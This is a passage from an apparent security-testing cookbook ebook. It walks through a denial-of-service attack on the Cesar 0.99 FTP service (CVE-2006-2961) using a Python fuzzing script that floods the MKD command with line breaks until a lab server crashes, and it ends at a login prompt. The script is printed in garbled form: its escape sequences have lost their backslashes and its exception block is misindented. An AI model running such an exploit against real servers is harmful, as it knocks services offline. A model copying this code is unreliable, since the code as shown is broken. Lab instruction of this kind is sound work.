How to do it...

There is a publicly disclosed vulnerability associated with the Cesar 0.99 FTP service. This vulnerability is defined by the Common Vulnerabilities and Exposures (CVE) numbering system as CVE-2006-2961. By performing research on this vulnerability, it becomes apparent that a stack-based buffer overflow can be triggered by sending a post-authentication sequence of line-break characters to the MKD function:

  1. To avoid the difficulty associated in passing the n escape sequence to the Python script and then having it properly interpreted in the supplied input, we should modify the script that was discussed in the previous recipe. We can then use the modified script to exploit this existing vulnerability, as follows:
        #!/usr/bin/python

        import socket
        import sys

        if len(sys.argv) != 5:
            print "Usage - ./ftp_fuzz.py [Target-IP]
             [Port Number] [Interval] [Maximum]"
            print "Example - ./ftp_fuzz.py 10.0.0.5 21 100 1000"
            print "Example will fuzz the defined FTP service
             with a series of line break "
            print "characters to include 100 'n's, 200 'n's,
             etc... up to the maximum of 1000"
            sys.exit()

        target = str(sys.argv[1])
        port = int(sys.argv[2])
        i = int(sys.argv[3])
        interval = int(sys.argv[3])
        max = int(sys.argv[4])
        user = raw_input(str("Enter ftp username: "))
        passwd = raw_input(str("Enter ftp password: "))
        command = raw_input(str("Enter FTP command to fuzz: "))

        while i <= max:
            try:
                payload = command + " " + ('n' * i)
                print "Sending " + str(i) + " line break
                 characters to target"
                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect((target,port))
                s.recv(1024)
                s.send('USER ' + user + 'rn')
                s.recv(1024)
                s.send('PASS ' + passwd + 'rn')
                s.recv(1024)
                s.send(payload + 'rn')
                s.send('QUITrn')
                s.recv(1024)
                s.close()
                i = i + interval
        except:
            print "nUnable to send...Server may have crashed"
            sys.exit()

        print "nThere is no indication that the server has crashed"
  1. Modifications made to the script include modifying the usage description and removing the payload as a supplied argument and then hardcoding a line-break payload into the script to be sent in sequence:
  1. If the script is executed without the appropriate number of system arguments, the script will return the expected usage. We can then execute the script and send a series of payloads as multiples of 100 and up to the maximum of 1000.
  1. After sending the payload of 700 line-break characters, the script stops sending payloads and sits idle. After a period of inactivity, the script is forced to close with Ctrl + C. The script indicates that it has been unable to send characters and that the remote server might have crashed. Have a look at the following screenshot:
  1. By returning to the Windows XP machine that is running the Cesar 0.99 FTP service, we can see that the server.exe application has crashed. To resume operations after the denial of service, the Cesar FTP service has to be manually restarted.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset